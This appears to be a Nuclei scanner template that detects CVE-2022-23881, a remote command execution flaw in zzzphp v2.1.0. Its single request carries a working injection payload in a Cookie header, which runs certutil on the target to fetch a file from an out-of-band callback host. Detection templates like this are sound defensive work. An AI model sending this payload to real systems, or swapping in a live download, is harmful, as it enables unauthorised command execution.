36 lines
1001 B
YAML
36 lines
1001 B
YAML
id: CVE-2022-23881
|
|
|
|
info:
|
|
name: zzzphp v2.1.0 RCE
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution (RCE) vulnerability via danger_key() at zzz_template.php.
|
|
reference:
|
|
- https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md
|
|
- http://www.zzzcms.com
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-23881
|
|
tags: cve,cve2022,rce,zzzphp,zzzcms
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2022-23881
|
|
cwe-id: CWE-77
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /?location=search HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|